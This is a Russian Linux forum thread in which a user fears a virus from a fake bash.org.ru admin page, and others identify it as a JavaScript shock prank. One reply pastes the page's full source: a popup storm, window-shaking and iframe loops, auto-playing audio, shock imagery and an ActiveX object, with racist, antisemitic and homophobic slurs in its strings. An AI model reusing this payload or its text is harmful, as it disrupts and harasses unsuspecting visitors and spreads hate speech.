У меня - вирус. Очень боюсь. (openSuSE 10.3)

[zenitur]

У меня openSuSE 10.3 и KDE. Залез на форум ibash'а и узнал, что есть такая штука - админка bash.org.ru, зашёл. http://bash.org.ru/app42/login . Окно FireFox тут же запрыгало просто дико, тормозил икс, и предлагался скачаться wmv-файл. Вот скриншот... http://rapidshare.com/files/133273922/screenshot345345.png . Закрыл через Ctrl+Alt+F5, ps -A, kill. У других также. Попробовал с Beryl, натуральнее прыгать стало... Стали раздаваться какие-то свуки, такой Брям... Не сразу понял, что от компа. Посмотрел сайты знакомств - пусто. Открыты только Konqueror и Amarok - второй я тут же закрыл. А в процессах он светится - добил. Закрыл всё остальное. Звук то пропадает, то звучит постоянно, как сейчас. Посоветовали top, top | grep 'whoami'. Отображает то баш, то консоль, то топ... А просто процессы показали вот что. Какой-то pickup, запущен под привелегиями какого-то postfix, как и umgr. Обе программы набираешь в консоли - говорит, что команда не найдена. И вообще, вот этого всего обычно не запускается. Вот, что было запущено после Beagle, который я запускал последим перед заходом на тот сайт:

Код: Выделить всё

10630 ? 00:00:15 beagled-helper
10716 ? 00:00:00 kio_uiserver
11053 ? 00:01:08 amarokapp
11066 ? 00:00:00 ruby
11072 ? 00:00:00 pickup
11086 tty5 00:00:00 bash
11230 ? 00:00:09 konqueror
11539 ? 00:00:09 artsd
11582 ? 00:00:00 kio_file
11590 ? 00:00:27 konqueror
12107 ? 00:00:00 kio_http
12111 ? 00:00:00 kio_http
12112 ? 00:00:00 kio_http
12113 ? 00:00:00 kio_http
12114 ? 00:00:00 kio_http
12133 ? 00:00:00 kio_http
12137 ? 00:00:00 kio_http
12138 ? 00:00:00 kio_http
12149 ? 00:00:00 kio_about
12158 ? 00:00:00 kio_http
12162 ? 00:00:00 kio_http
12169 ? 00:00:00 kio_http
12278 ? 00:00:00 kio_http
12310 ? 00:00:00 konsole
12311 pts/2 00:00:00 bash
12320 pts/2 00:00:00 ps

Обычно многого из этого не запускается. Пикап тот же. Закрываю его из рута, все kio_* из пользователя - они снова открываются. К ним присоединился ksysguardd. dd - это демон ведь? ksysguard это диспетчер задач в KDE, а ksysguardd... Да ещё и со значком от KInfoCenter! Я попробовал сделать так: в Calc набрал kill 11063, ниже kill 11064 и растянул вниз до 13000. Вставил в консоль рута. Закрылось всё, конечно, но пооткрывалось снова! Я думаю, это вирус! Просвящённые люди, скажите! Так ли это?! Смотрел /var/log/messages, вроде всё хорошо, только сбойные сектора пошаливают. Перезагружаться не хочу.
Может, это перебор. Вот так глючит ksysguard без двойного d: http://rapidshare.com/files/133290580/43.png , http://rapidshare.com/files/133295573/44.png .

Да, ksysguard открыт, при закрытии ksysguardd е закрывается. При закрытии ksysguard не исчезает никуда ksysguardd.

[(asper]

У меня БОР вообще не открывается (
А по ссылке из-под венды нод кричит: probably a variant of HTML/Exploit.DialogArg.A trojan
и кстати перенаправляется на xakep.on.nimp.org

То ли взломали его, то ли очередной самопиар, то ли просто прикол. )

[Kris]

Интересно как он залился на локальную машину ,
to zenitur: нашел куда заливать скрины, rapidshare.com ;(
какая версия firefox ?

[(asper]

Кстати сам БОР вроде заработал.

[Black]

<...>Попробовал с Beryl, натуральнее прыгать стало...<...>

[Kris]

мне понравилось, gentoo в связке с opera улетает

убийством браузера по pid решило проблему, буду дальше разбираться, интересная тема )
мне попугайчего показало xD

[Topper]

А у меня все выжило, но зато показало внутренности мужской прямой кишки. Очаровательный подарок для сидящего на работе, да.

[(asper]

А у меня все выжило, но зато показало внутренности мужской прямой кишки. Очаровательный подарок для сидящего на работе, да.

Меня тоже чуть не стошнило.
Хорошо вокруг никого не было )

[Kris]

Код:

<script type="text/javascript"> function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately"); } function ctrlkey() { if (event.keyCode == 17) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately"); } function delkey() { if (event.keyCode == 46) alert("LAST MEASURE BY PENISBIRD, Rolloffle, and Rucas.\nStarring:\nSpin\nTubgirl\nLemonparty\nBob Goatse\nPenisbird\nPillowfight\nChristmas\nRusty's Wife\nWhat the fuck? That guy's ass is showing in his baby's picture!\n\n\nTotal, complete, all-versions, popup blocker bashing-to-pieces by goat-see\nnhey.swf by rkz\nPROPS TO GNAA. LOL HY -- DiKKy (GNAA NORWAY CORRESPONDANT)\nUpdated by sam, Jmax, JacksonBrown, Dessimat0r, timecop, and others.\n"); } var nom = navigator.appName.toLowerCase(); var agt = navigator.userAgent.toLowerCase(); var is_major = parseInt(navigator.appVersion); var is_minor = parseFloat(navigator.appVersion); var is_ie = (agt.indexOf("msie") != -1); var is_ie4up = (is_ie && (is_major >= 4)); var is_nav = (nom.indexOf('netscape')!=-1); var is_nav4 = (is_nav && (is_major == 4)); var is_mac = (agt.indexOf("mac")!=-1); var is_gecko = (agt.indexOf('gecko') != -1); // GECKO REVISION var is_rev = 0 if (is_gecko) { temp = agt.split("rv:") is_rev = parseFloat(temp[1]) } function procreate() { for(i = 0; i < 16; i++) { popUp("index.php?popup=1"); } } function popUp(URL) { day = new Date(); id = day.getTime(); eval("page" + id + " = window.open(URL, '_blank', 'toolbar=0,scrollbars=0,location=1,statusbar=0,menubar=0,resizable=0,width=64 0,height=583');"); } goatseflash = '<div id="hello" style="z-index: 50; position: fixed; top: 0px; left: 0px; width: 100%; height: 100%;">'; goatseflash += ' <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="100%" height="100%">'; goatseflash += ' <param name="movie" value="http://static.nimp.org/flash/hello.swf" />' goatseflash += ' <param name="wmode" value="transparent" />'; goatseflash += ' </object>' goatseflash += '</div>'; function load_goatse() { document.body.innerHTML += goatseflash; setTimeout("unload_goatse()", 3000); // 3s } function unload_goatse() { document.getElementById("hello").style.display = 'none'; } var protos = [ "http://static.nimp.org/lm.pdf", "http://static.nimp.org/jews.wmv", "irc://irc.gnaa.us/gnaa", "irc://irc.efnet.org/politics", "news:alt.flame.niggers", "news:alt.flame.faggots", "mailto:JOIN@THE.GNAA?subject=2006_RECRUITMENT_DRIVE&body=www.gnaa.us", "callto://JOIN_THE_GNAA__2005_RECRUITMENT_DRIVE", "aim:GoIM?screenname=Gary_Niger&message=HY+LOL+HY+LOL", "rlogin://1.1.1.1:80", "telnet://1.1.1.1:80", "aim:addbuddy?listofscreennames=HY,LOL,HY,LOL,HY,LOL,join,the,gnaa,2006,RECRUITMENT,DRIVE,hear tiez2incog&groupname=gnaa", "mailto:JOIN@THE.GNAA?subject=2006_RECRUITMENT_DRIVE&body=www.gnaa.us", "ed2k://|file|Gayniggers From Outer Space [GNAA Digitally Remastered].avi|134174720|F8AF9D8A7091CD7A7B8968C9EB397C02|/", ]; function add(str) { div = document.getElementById('goatse'); div.innerHTML = '<iframe style="width: 1; height: 1;" src="' + str + '"></iframe>'; } function ruin() { document.body.innerHTML += '<div id="goatse">Y HALLO THAR!</div>'; while (1) { for (i = 0; i < protos.length; i++) { add(protos[i]); } } } </script> <link rel="icon" type="image/x-icon" href="http://static.nimp.org/favicon.ico"> <link rel="shortcut icon" type="image/x-icon" href="http://static.nimp.org/favicon.ico"> <style type="text/css"> html { height: 100%; width: 100%; overflow: hidden; } body { height: 100%; width: 100%; margin: 0; padding: 0; } </style> </head><body style="background-image: url(http://static.nimp.org/images/penisbird.gif); background-color: rgb(255, 255, 255);" onload="load_goatse();document.goatse.reset();movew0w();setTimeout('ruin()', 20);" onmousemove="document.goatse.reset();movew0w();procreate();" onkeydown="altf4key();ctrlkey();delkey();procreate();" onunload="document.goatse.reset();movew0w();procreate();" onmouseover="document.goatse.reset();movew0w();procreate();"> <script type="text/javascript"> <!-- var images = new Array(); var imagecount = 0; var delay = 10; var step = .2; var curstep = 0; window.resizeTo(800, 600); var centerX = (self.screen.width - document.body.clientWidth) / 2; var centerY = (self.screen.height - document.body.clientHeight - 120) / 2; movew0w(); function movew0w() { var j; for (j = 0; j < 5; j++) { curstep += step / 5; var factorX = Math.sin(curstep * 6.1) * 0.9; var factorY = Math.cos(curstep * 3.7) * 0.9; factorX += 0.2 * Math.sin((20*Math.sin(curstep/20))+j*70) * (Math.sin(10+curstep/(10+j))+0.2) * Math.cos((curstep + j*25)/10); factorY += 0.2 * Math.cos((20*Math.sin(curstep/(20+j)))+j*70) * (Math.sin(10+curstep/10)+0.2) * Math.cos((curstep + j*25)/10); self.moveTo(centerX * (1.0 + factorX), centerY * (1.0 + factorY)); } document.body.background = images[(Math.floor(curstep) % imagecount) + 1]; setTimeout("movew0w()", delay); } // --> </script> <div> <object id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="1" height="1"> <param name="ActivateApplets" value="1"> <param name="ActivateActiveXControls" value="1"> </object> </div> <table> <tbody><tr> <td valign="middle"> <div style="text-align: center;"> <a href="http://www.gnaa.us/"><img src="GNAA%20Last%20Measure%20Live%21%20%E2%80%94%20%D1%84%D0%B0%D0%B9%D0%BB%D1%8B/gnaa.png" alt="GNAA"></a> <br> <br> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"> <param name="movie" value="http://static.nimp.org/flash/first_opener.swf"> <param name="quality" value="high"> </object> </div> </td> </tr> </tbody></table> <div> <!-- This object plays the "hey everybody, I'm watching gay porno!" sound --> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" id="hey" width="1" height="1"> <param name="movie" value="http://static.nimp.org/flash/hey.swf"> <param name="quality" value="high"> </object> <script type="text/javascript"> <!-- var audio = new Array(); var audiocount = 16; audio[0] = 'http://static.nimp.org/audio/lolichan.wav'; audio[1] = 'http://static.nimp.org/audio/eska.wav'; audio[2] = 'http://static.nimp.org/audio/fury.wav'; audio[3] = 'http://static.nimp.org/audio/popeye.wav'; audio[4] = 'http://static.nimp.org/audio/kirk.wav'; audio[5] = 'http://static.nimp.org/audio/abez2.wav'; audio[6] = 'http://static.nimp.org/audio/original.wav'; audio[7] = 'http://static.nimp.org/audio/rkz.wav'; audio[8] = 'http://static.nimp.org/audio/blackman.wav'; audio[9] = 'http://static.nimp.org/audio/jesuitx1.wav'; audio[10] = 'http://static.nimp.org/audio/rucas.wav'; audio[11] = 'http://static.nimp.org/audio/jesuitx2.wav'; audio[12] = 'http://static.nimp.org/audio/jizzy.wav'; audio[13] = 'http://static.nimp.org/audio/sam.wav'; audio[14] = 'http://static.nimp.org/audio/abez.wav'; audio[15] = 'http://static.nimp.org/audio/trogg.wav'; for (i = 0; i < audiocount; i++) { setTimeout('document.getElementById("audio").innerHTML += \'<embed src="' + audio[i] + '" loop="true" />\';', 6000 * (i/2)); } // --> </script> <div id="audio"></div> <applet code="GNAA%20Last%20Measure%20Live!%20%E2%80%94%20%D1%84%D0%B0%D0%B9%D0%BB%D1%8B/LastCoffee.class" width="100" height="100"> <div> <iframe style="width: 1px; height: 1px;" src="GNAA%20Last%20Measure%20Live%21%20%E2%80%94%20%D1%84%D0%B0%D0%B9%D0%BB%D1%8B/index.php"></iframe> <iframe style="width: 1px; height: 1px;" src="GNAA%20Last%20Measure%20Live%21%20%E2%80%94%20%D1%84%D0%B0%D0%B9%D0%BB%D1%8B/lm."></iframe> <iframe style="width: 1px; height: 1px;" src="lm_data/jews.htm"></iframe>

собственно , никакой это не дефейс ibash,просто решили прикальнуться над теми, кто рысчет админку xD

Насчет прыгающих окон, полностью javascript ;(

[VlSePr]

Веселая фигня, блин жаль под lynx где я впервые его запустил не заработало. Кстати у меня на SUSE 11 таких жутких как у автора глюков не было. Вопрос из зала а что то за процес такой kio ???

[Kris]

Веселая фигня, блин жаль под lynx где я впервые его запустил не заработало. Кстати у меня на SUSE 11 таких жутких как у автора глюков не было. Вопрос из зала а что то за процес такой kio ???

Возможно не прописан путь до flash-проигрывателя и отключена поддержка javascripts , насчет kio хз, но живых эксплойтов под linux не видел

[Ben Aceler]

Веселая фигня, блин жаль под lynx где я впервые его запустил не заработало. Кстати у меня на SUSE 11 таких жутких как у автора глюков не было. Вопрос из зала а что то за процес такой kio ???

KIO - KDE Input/Optput.
ksysguardd - штатный демон ksysguard, kio-http - дочерные процессы konqueror.

Я не понял, где вирус-то?

[/dev/random]

Я не понял, где вирус-то?

Да нет никакого вируса, просто забавный скрипт на странице. И всё.

Кстати, у меня:
ion3 => окна прыгать не могут
нет флэша => никаких гадостей не показывало
отключено встраиваемое аудио => ничего не воспроизводилось
и т.д. и т.п.

Короче, получилась просто постоянно обновляющаяся страничка с просьбой установить плагин

[VlSePr]

Возможно не прописан путь до flash-проигрывателя и отключена поддержка javascripts ,

Все ушол настраивать flash плеер под lynx

[zenitur]

Это был телефон, забытый в походной сумочке, а не динамик клавиатуры... Скачал telnet'ом и wget'ом, тоже нашёл скрипт. Значит, вырубаю Яву и ничего обнулять не надо! Странно, что на хакерский сайт пересылает с БАШа! Он давно деградировал. После хакерской атаки в октябре, а особенно после Нового Года. VlSePr, А DivX под Pentium запустишь?

[Kris]

Возможно не прописан путь до flash-проигрывателя и отключена поддержка javascripts ,

Все ушол настраивать flash плеер под lynx

действительно лол, необратил внимание на название xD, а что неплохо, текстовый браузер с флэш

[VlSePr]

действительно лол, необратил внимание на название xD, а что неплохо, текстовый браузер с флэш

Моя мечта , а вообще lynx мой любимый помошник, особенно на первые месяцы освоения ситемы был. Я тогда себе то Иксы убью, то еще что то сделал. и тут прямо на месте из консоли можно форум почитать подумать, и найти решение. маны это хорошо а маны и интернет просто супер.

[Sekta-N]

айайай, а у меня noscript, и ограничение процессора для ff стоят.

[zett]

Браузер какой шустрый, еле поймала...

[Палач]

прикололо FF3, достаточно нажать Ctrl+F4 и фсе. Похоже точно, - прикол для любителей искать админки

[zenitur]

О, спасибо! А я тоже нашёл решение: залезть в настройки и снять галочки с Java, окно стару останавливается.